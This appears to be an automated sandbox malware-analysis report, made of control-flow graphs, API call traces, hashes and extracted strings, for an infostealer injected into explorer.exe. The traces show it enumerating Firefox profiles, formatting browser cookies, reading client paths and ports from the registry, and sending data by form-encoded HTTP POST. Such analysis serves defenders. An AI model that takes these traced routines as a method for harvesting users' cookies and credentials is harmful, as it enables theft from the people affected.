                                                                        control_flow_graph 348 e028f8-e028fa 349 e02900-e0291c call e01000 call e202ec 348->349 350 e02ac8-e02ada call e53848 DeleteFileW call e01011 348->350 359 e02922-e0293a call e01fa7 349->359 360 e02a8f-e02aa2 call e1fb92 lstrlen 349->360 358 e02adf-e02ae6 350->358 367 e02948-e0295f call e01fa7 359->367 368 e0293c-e02942 359->368 365 e02ac1-e02ac3 call e01011 360->365 366 e02aa4-e02abc call e01798 * 3 360->366 365->350 366->365 376 e02961-e02967 367->376 377 e0296d-e02984 call e01fa7 367->377 368->367 370 e02944 368->370 370->367 376->377 379 e02969 376->379 383 e02992-e029a7 call e01fa7 377->383 384 e02986-e0298c 377->384 379->377 388 e029b5-e029cc call e01fa7 383->388 389 e029a9-e029af 383->389 384->383 385 e0298e 384->385 385->383 393 e029da-e029e5 lstrlen 388->393 394 e029ce-e029d4 388->394 389->388 390 e029b1 389->390 390->388 396 e02a79-e02a85 call e202ec 393->396 397 e029eb-e029f0 lstrlen 393->397 394->393 395 e029d6 394->395 395->393 396->359 403 e02a8b 396->403 397->396 399 e029f6-e02a11 call e01000 397->399 404 e02a13 399->404 405 e02a1b-e02a56 call e02112 wsprintfA lstrlen 399->405 403->360 404->405 408 e02a58-e02a68 call e0102f 405->408 409 e02a6a-e02a74 lstrcat call e01011 405->409 408->409 409->396
                                                                        APIs
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00E02AD2
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 00E029E1
                                                                        • lstrlen.KERNEL32(00000000), ref: 00E029EC
                                                                        • wsprintfA.USER32 ref: 00E02A38
                                                                        • lstrlen.KERNEL32(00000000), ref: 00E02A44
                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E02A6C
                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00E02A99
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                        • API String ID: 304071051-2605711689
                                                                        • Opcode ID: 86ebbc8ba13f0667fc690d63ec288a988fc9ad2e773f8522ba90ace9322daeb9
                                                                        • Instruction ID: 0201c217add21aa4d62fe13b48457704d423d28693543c0178d9facf932eb3e2
                                                                        • Opcode Fuzzy Hash: 86ebbc8ba13f0667fc690d63ec288a988fc9ad2e773f8522ba90ace9322daeb9
                                                                        • Instruction Fuzzy Hash: 4351DF307043478BC729EF218854A3F76EAAFC5309F44286DF985BB292DB35DC898752

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 484 e02cb5-e02cc7 call e01953 488 e02e17-e02e2d call e02ae9 484->488 489 e02ccd-e02d06 call e01953 call e01000 * 2 call e01b6a 484->489 500 e02df9-e02e12 call e01011 * 4 489->500 501 e02d0c-e02d1c GetPrivateProfileSectionNamesW 489->501 500->488 501->500 502 e02d22-e02d26 501->502 504 e02df5 502->504 505 e02d2c-e02d32 502->505 504->500 507 e02d36-e02d39 505->507 509 e02ded-e02df1 507->509 510 e02d3f-e02d4d StrStrIW 507->510 509->504 513 e02d53-e02d70 GetPrivateProfileStringW 510->513 514 e02dd7-e02de7 lstrlenW 510->514 513->514 516 e02d72-e02d88 GetPrivateProfileIntW 513->516 514->507 514->509 518 e02d8a-e02d9c call e01953 516->518 519 e02dcc-e02dd2 call e02ae9 516->519 523 e02db4-e02dca call e02ae9 call e01011 518->523 524 e02d9e-e02da2 518->524 519->514 523->514 526 e02da4-e02daa 524->526 527 e02dac-e02db2 524->527 526->527 527->523 527->524
                                                                        APIs
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                          • Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
                                                                          • Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F
                                                                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00E02D13
                                                                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 00E02D45
                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,00E5637C,?,00000FFF,?), ref: 00E02D68
                                                                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00E02D7B
                                                                        • lstrlenW.KERNEL32(00000000), ref: 00E02DD8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                        • API String ID: 2234428054-4107377610
                                                                        • Opcode ID: 59300010414c04248966fc185236f6b6ef8f9f6b21611d343b62323343cd25ea
                                                                        • Instruction ID: cb88c7a5a34958a241fd2f7811999093cf8ba962775fe9d6a31163269066e2f1
                                                                        • Opcode Fuzzy Hash: 59300010414c04248966fc185236f6b6ef8f9f6b21611d343b62323343cd25ea
                                                                        • Instruction Fuzzy Hash: A131AD307043029BCB24AB31881563FB6E2AFC4304F50686DFA46BB2D2DF758CCA9752

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 576 e01333-e01385 call e01000 call e0106c call e012a3 583 e013a0-e013a3 576->583 584 e01387-e0139e 576->584 586 e013aa-e013ac 583->586 587 e013b0-e013b2 584->587 586->587 588 e013b8-e013ef RtlZeroMemory 587->588 589 e015cb-e015da call e01011 587->589 593 e015c3-e015ca 588->593 594 e013f5-e0141a 588->594 593->589 597 e01420-e01456 call e010b1 594->597 598 e015bf 594->598 601 e01458 597->601 602 e0145d-e01478 597->602 598->593 601->602 604 e015b5 602->604 605 e0147e-e01483 602->605 604->598 606 e01485-e01496 605->606 607 e0149d-e014c7 call e01000 wsprintfW 605->607 606->607 610 e014e0-e01509 607->610 611 e014c9-e014cb 607->611 618 e015a5 610->618 619 e0150f-e0151b 610->619 612 e014cc-e014cf 611->612 614 e014d1-e014d6 612->614 615 e014da-e014dc 612->615 614->612 616 e014d8 614->616 615->610 616->610 621 e015ac-e015b0 call e01011 618->621 619->618 622 e01521-e01537 call e01000 619->622 621->604 626 e01539-e01544 622->626 627 e01546-e01553 call e0102f 626->627 628 e01558-e0156f 626->628 627->628 632 e01571 628->632 633 e01573-e0157d 628->633 632->633 633->626 634 e0157f-e01583 633->634 635 e01585 call e0104c 634->635 636 e0159a-e015a1 call e01011 634->636 639 e0158a-e01594 RtlMoveMemory 635->639 636->618 639->636
                                                                        APIs
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                          • Part of subcall function 00E0106C: lstrlen.KERNEL32(035270FE,00000000,00000000,00000000,00E01366,74DE8A60,035270FE,00000000), ref: 00E01074
                                                                          • Part of subcall function 00E0106C: MultiByteToWideChar.KERNEL32(00000000,00000000,035270FE,00000001,00000000,00000000), ref: 00E01086
                                                                          • Part of subcall function 00E012A3: RtlZeroMemory.NTDLL(?,00000018), ref: 00E012B5
                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00E013C2
                                                                        • wsprintfW.USER32 ref: 00E014B5
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00E01594
                                                                        Strings
                                                                        • Accept: */*Referer: %S, xrefs: 00E014AF
                                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 00E014FB
                                                                        • POST, xrefs: 00E01465
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                        • API String ID: 3833683434-704803497
                                                                        • Opcode ID: 9eb840fd6159bebc5694407e7942faa40c729beb6cdedec635aeecf7d487f037
                                                                        • Instruction ID: 54600d603a79abfa99f12cc47f47253147117e360b2bbc51b7c40cfb030d4c87
                                                                        • Opcode Fuzzy Hash: 9eb840fd6159bebc5694407e7942faa40c729beb6cdedec635aeecf7d487f037
                                                                        • Instruction Fuzzy Hash: 30719A70608301AFD7149F65DC84A2BBBE9FF88345F40196DF995EB2A1DB70CD888B52

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 641 e0a40e-e0a424 642 e0a4a2-e0a4aa 641->642 643 e0a426-e0a42a 641->643 646 e0a4ae-e0a4c8 642->646 644 e0a431-e0a441 643->644 645 e0a42c-e0a42f 643->645 647 e0a443 644->647 648 e0a469-e0a4a0 memcpy 644->648 645->642 645->644 649 e0a4cc-e0a4d8 646->649 650 e0a445-e0a448 647->650 651 e0a44a-e0a45a memcpy 647->651 648->646 652 e0a4e1-e0a4e3 649->652 650->648 650->651 653 e0a45d 651->653 654 e0a524-e0a538 call e0a2aa 652->654 655 e0a4e5-e0a4ee 652->655 656 e0a45f-e0a466 653->656 654->653 661 e0a53e-e0a553 memset 654->661 655->654 660 e0a4f0-e0a4ff call e0a250 655->660 660->649 664 e0a501-e0a51f call e0a1c6 660->664 661->656 664->656
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$FileReadmemset
                                                                        • String ID: winRead$S
                                                                        • API String ID: 2051157613-1961733145
                                                                        • Opcode ID: 79e53559f4e5d7ac17312a5b78cca163784c03fe2b95b6f40a4a73e72a279aac
                                                                        • Instruction ID: 530ea7d673a3e03917d679920926ef87d35c0caedde75c0bdc7182794a1f444e
                                                                        • Opcode Fuzzy Hash: 79e53559f4e5d7ac17312a5b78cca163784c03fe2b95b6f40a4a73e72a279aac
                                                                        • Instruction Fuzzy Hash: 8131A076205309AFC740DE68CC8599F77E6EFC4354F886928F895A7291E670EC448B53

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 667 e0a67c-e0a692 668 e0a6c1-e0a6c4 667->668 669 e0a694-e0a6bf _alldiv _allmul 667->669 670 e0a6c7-e0a6d2 call e0a33b 668->670 669->670 673 e0a6f0 670->673 674 e0a6d4-e0a6df 670->674 677 e0a6f9-e0a6fb 673->677 675 e0a6e4-e0a6ee call e0a1c6 674->675 681 e0a722-e0a726 675->681 679 e0a6fd-e0a708 677->679 680 e0a71e 677->680 679->680 686 e0a70a-e0a71c 679->686 680->681 682 e0a728-e0a72b 681->682 683 e0a73a-e0a740 681->683 682->683 685 e0a72d 682->685 687 e0a734-e0a737 685->687 688 e0a72f-e0a732 685->688 686->675 687->683 688->683 688->687
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File_alldiv_allmul
                                                                        • String ID: @T$winTruncate1$winTruncate2
                                                                        • API String ID: 3568847005-4058645489
                                                                        • Opcode ID: 98867eec5ee0307661dfc29d6efaa79494742ed7e8b7d86bfc60512a799dd251
                                                                        • Instruction ID: 76b4412521d06fc729ef7578ceead9dec85cb8b5fdee8769dd57a5b2e9af4664
                                                                        • Opcode Fuzzy Hash: 98867eec5ee0307661dfc29d6efaa79494742ed7e8b7d86bfc60512a799dd251
                                                                        • Instruction Fuzzy Hash: 8F21C172201304ABCB148E29CC85EA777A9EF84355F1DA169FD14EB286D635DC90CB62

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 715 e0b87b-e0b88a 716 e0b88d-e0b8e3 memset 715->716 717 e0b903 716->717 718 e0b8e5-e0b8f3 call e0b64b 716->718 720 e0b905-e0b914 call e0b609 717->720 723 e0baf3-e0baf9 718->723 724 e0b8f9-e0b901 718->724 726 e0bae3 720->726 727 e0b91a-e0b923 call e0b828 720->727 724->720 729 e0bae8-e0baf1 call e068ec 726->729 732 e0bad6-e0bae1 call e068ec 727->732 733 e0b929-e0b941 727->733 729->723 732->729 735 e0b943-e0b944 733->735 736 e0b946-e0b94d 733->736 738 e0b950-e0b962 735->738 736->738 740 e0b965-e0b96e 738->740 741 e0b975-e0b97c 740->741 742 e0b9cb-e0b9e4 call e0a2aa 741->742 743 e0b97e-e0b983 741->743 751 e0ba41-e0ba46 742->751 752 e0b9e6-e0b9fd call e068ec * 2 742->752 745 e0b985-e0b9aa call e06614 call e0bb9f call e06620 743->745 746 e0b9b6-e0b9c9 call e0a250 743->746 767 e0b9b2 745->767 768 e0b9ac-e0b9b0 745->768 746->740 746->742 754 e0ba54-e0ba6e call e068ec * 2 751->754 755 e0ba48-e0ba52 751->755 770 e0ba14-e0ba3c call e0a1c6 call e54db2 752->770 771 e0b9ff-e0ba04 752->771 773 e0ba70-e0ba72 754->773 774 e0ba74 754->774 755->754 767->746 768->742 768->767 770->723 771->770 775 e0ba06-e0ba0f 771->775 777 e0ba79-e0ba8a 773->777 774->777 775->716 779 e0ba90-e0baa2 call e552ae 777->779 780 e0ba8c 777->780 784 e0baa4 779->784 785 e0baa8-e0bad4 779->785 780->779 784->785 785->723
                                                                        APIs
                                                                        • memset.NTDLL ref: 00E0B8D5
                                                                        • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 00E0B96F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFilememset
                                                                        • String ID: psow$winOpen$S
                                                                        • API String ID: 2416746761-4294840145
                                                                        • Opcode ID: 58ebb914d1ffda1006d4d1797bff4d09f5351fc78f9a95083ffffbde3d0537d7
                                                                        • Instruction ID: 80caec550ffb449317fa09e2c9c477a5a52d5dc9914eb87375c9dd8ef3a77848
                                                                        • Opcode Fuzzy Hash: 58ebb914d1ffda1006d4d1797bff4d09f5351fc78f9a95083ffffbde3d0537d7
                                                                        • Instruction Fuzzy Hash: 9E718B71A04702AFC710DF29C981B5ABBE0FF88324F145A29F964B72D1D774D994CBA2

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 786 e0b1e5-e0b20b 787 e0b221-e0b22a 786->787 788 e0b20d-e0b218 call e0aeea 786->788 790 e0b240-e0b243 787->790 791 e0b22c-e0b237 call e0ae65 787->791 796 e0b3ea-e0b3f0 788->796 797 e0b21e 788->797 794 e0b3b9-e0b3d3 790->794 795 e0b249-e0b26b call e0a7ae 790->795 803 e0b3b4-e0b3b7 791->803 804 e0b23d 791->804 798 e0b3db-e0b3df 794->798 808 e0b296-e0b29f 795->808 809 e0b26d-e0b278 795->809 797->787 801 e0b3e1-e0b3e3 798->801 802 e0b3e8 798->802 801->802 807 e0b3e5-e0b3e7 801->807 802->796 803->794 806 e0b3d5-e0b3d8 803->806 804->790 806->798 807->802 810 e0b2a1 808->810 811 e0b2d6-e0b2ea call e06a5a 808->811 812 e0b27d-e0b291 call e0a1c6 809->812 814 e0b2a3-e0b2a7 810->814 815 e0b2a9-e0b2ad 810->815 820 e0b2f6-e0b2fd 811->820 821 e0b2ec-e0b2f1 811->821 812->803 814->811 814->815 815->803 818 e0b2b3-e0b2b9 call e0a67c 815->818 823 e0b2be-e0b2c2 818->823 825 e0b373 820->825 826 e0b2ff-e0b30e 820->826 821->803 823->811 827 e0b2c4-e0b2d4 823->827 828 e0b377-e0b37a 825->828 826->828 827->812 829 e0b310-e0b329 CreateFileMappingW 828->829 830 e0b37c 828->830 831 e0b32b-e0b357 MapViewOfFile 829->831 832 e0b37e-e0b3ab call e0a1c6 829->832 830->803 831->832 833 e0b359-e0b370 831->833 832->803 837 e0b3ad 832->837 833->825 837->803
                                                                        APIs
                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 00E0B31D
                                                                        • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 00E0B34F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$CreateMappingView
                                                                        • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                        • API String ID: 3452162329-3826999013
                                                                        • Opcode ID: 65d5babb269a38723c6c5efaaedaf24f5a7005c91e373a7f1cefc8d7fd789d5c
                                                                        • Instruction ID: 63eb61329243d93cb13c30154d703311cb314aa47a41694c33eec0e461678de9
                                                                        • Opcode Fuzzy Hash: 65d5babb269a38723c6c5efaaedaf24f5a7005c91e373a7f1cefc8d7fd789d5c
                                                                        • Instruction Fuzzy Hash: 7751C171204701DFDB25CF18C841A6B77E5FF94348F24982EE982AB2D1DBB4E889CB51
                                                                        APIs
                                                                        • StrStrIW.KERNELBASE(?,?), ref: 00E02E4B
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00E02EE4
                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E02F54
                                                                        • RegCloseKey.KERNELBASE(?), ref: 00E02F62
                                                                          • Part of subcall function 00E019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A1E
                                                                          • Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A3C
                                                                          • Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A75
                                                                          • Part of subcall function 00E019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A98
                                                                          • Part of subcall function 00E01BC5: lstrlenW.KERNEL32(00000000,00000000,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01BCC
                                                                          • Part of subcall function 00E01BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01BF0
                                                                          • Part of subcall function 00E01BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01C05
                                                                          • Part of subcall function 00E01BC5: lstrlenW.KERNEL32(00000000,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01C1C
                                                                          • Part of subcall function 00E01AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00E02E83,PathToExe,00000000,00000000), ref: 00E01B16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                        • String ID: PathToExe
                                                                        • API String ID: 1799103994-1982016430
                                                                        • Opcode ID: 356f6fc51fee46c4b0945bbd4a5801d406d6965ae545dd41e5a063b8dfbd8a45
                                                                        • Instruction ID: 929e39d5df77cacaffa4c47761a229ab6fddb599ea22bdfa84c3ebbdfa20ebca
                                                                        • Opcode Fuzzy Hash: 356f6fc51fee46c4b0945bbd4a5801d406d6965ae545dd41e5a063b8dfbd8a45
                                                                        • Instruction Fuzzy Hash: 6F318F316043116FCB16AF21CC1986F7AEAEFC4350B04951DF955AB2C0DA34C986CBA1
                                                                        APIs
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • wsprintfW.USER32 ref: 00E04AA2
                                                                        • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00E04AC7
                                                                        • RegCloseKey.KERNELBASE(?), ref: 00E04AD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                        • String ID: %s\%08x$Software
                                                                        • API String ID: 1800864259-1658101971
                                                                        • Opcode ID: 274cc68d5831e4eeef2dce4c45c2148fc2f3f62d063954d4f37da003a5e8cc87
                                                                        • Instruction ID: 1d4a32f4ab85565d4d82f4faa0344063f494af057bf65721984f637b1bd84926
                                                                        • Opcode Fuzzy Hash: 274cc68d5831e4eeef2dce4c45c2148fc2f3f62d063954d4f37da003a5e8cc87
                                                                        • Instruction Fuzzy Hash: A501D4B1600208BFDB189F95DC4ADBF77BDEB40355B8001AEFA05B3180EAB05D849660
                                                                        APIs
                                                                        • _alloca_probe.NTDLL ref: 00E0431C
                                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00E04335
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E04363
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00E043C8
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
                                                                          • Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994
                                                                          • Part of subcall function 00E0418A: wsprintfW.USER32 ref: 00E04212
                                                                          • Part of subcall function 00E01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
                                                                          • Part of subcall function 00E01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E043B9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                        • String ID:
                                                                        • API String ID: 801677237-0
                                                                        • Opcode ID: 4d4a18fb5eb5a068daacd2c42f966856838782eb3774f40d6f45abed6de5d0bb
                                                                        • Instruction ID: 60225f3939014498409ef0ebc526a6592b3459e482db8c465280ff8d2b38ea10
                                                                        • Opcode Fuzzy Hash: 4d4a18fb5eb5a068daacd2c42f966856838782eb3774f40d6f45abed6de5d0bb
                                                                        • Instruction Fuzzy Hash: 721182F1104201BFE7159B10CC45DBF77EDEB88344F005A2EF989E2190EB749D889B62
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E67000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E67000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e67000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f28febb4cba77866872504b8491459f0bad4dc7c298fea65022eba6a091dc25
                                                                        • Instruction ID: 524adb3d9437a46b33a2dc38ca1d9e2c322c3661dd364165dd90e7eb9e1686bf
                                                                        • Opcode Fuzzy Hash: 9f28febb4cba77866872504b8491459f0bad4dc7c298fea65022eba6a091dc25
                                                                        • Instruction Fuzzy Hash: 4CA14B729943525BD7218F78ECC06E07BA9EB523A4B2C166DC5E1EB2C3EB705807C761
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A1E
                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A3C
                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A75
                                                                        • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A98
                                                                          • Part of subcall function 00E01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
                                                                          • Part of subcall function 00E01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                        • String ID:
                                                                        • API String ID: 217796345-0
                                                                        • Opcode ID: f7963104c10c61d4a273249f509b38ddd43b983c5af77b83f3d58127ae77eb39
                                                                        • Instruction ID: 13caa5e70bc46af68aadb26fce6575eb32e7213878576b26d9ef140439f1e731
                                                                        • Opcode Fuzzy Hash: f7963104c10c61d4a273249f509b38ddd43b983c5af77b83f3d58127ae77eb39
                                                                        • Instruction Fuzzy Hash: 3521D3723063416FEB288B21CD44F7BB7F9EBC8759F000A6DF985BA180E630CD858621
                                                                        APIs
                                                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00E01ED5
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E01F0C
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00E01F98
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
                                                                          • Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
